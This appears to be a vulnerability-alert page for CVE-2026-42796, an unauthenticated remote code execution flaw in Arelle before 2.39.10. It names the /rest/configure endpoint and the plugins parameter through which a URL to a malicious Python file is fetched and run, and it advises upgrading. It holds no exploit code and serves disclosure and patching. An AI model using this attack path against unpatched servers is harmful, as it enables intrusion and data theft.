Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
9.2
CVE-2026-42796: Arelle before 2.39.10 allows malicious code execution
CVE-2026-42796
Summary
An attacker can upload and run their own code on the Arelle server without permission, potentially gaining control of the system. This is a serious issue because it allows unauthorized access and could lead to data theft or system compromise. Update Arelle to version 2.39.10 or later to fix this vulnerability.
Original title
Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint that accepts a plugins query parameter and forwards it to the plugin manag...
Original description
Arelle before 2.39.10 contains an unauthenticated remote code execution vulnerability in the /rest/configure REST endpoint that accepts a plugins query parameter and forwards it to the plugin manager without authentication or authorization. Attackers can supply a URL to a malicious Python file through the plugins parameter, causing the Arelle webserver to download and execute the attacker-controlled code within the Arelle process with its privileges.
nvd CVSS3.1
9.8
nvd CVSS4.0
9.2
Vulnerability type
CWE-306
Missing Authentication for Critical Function
Published: 4 May 2026 · Updated: 30 May 2026 · First seen: 4 May 2026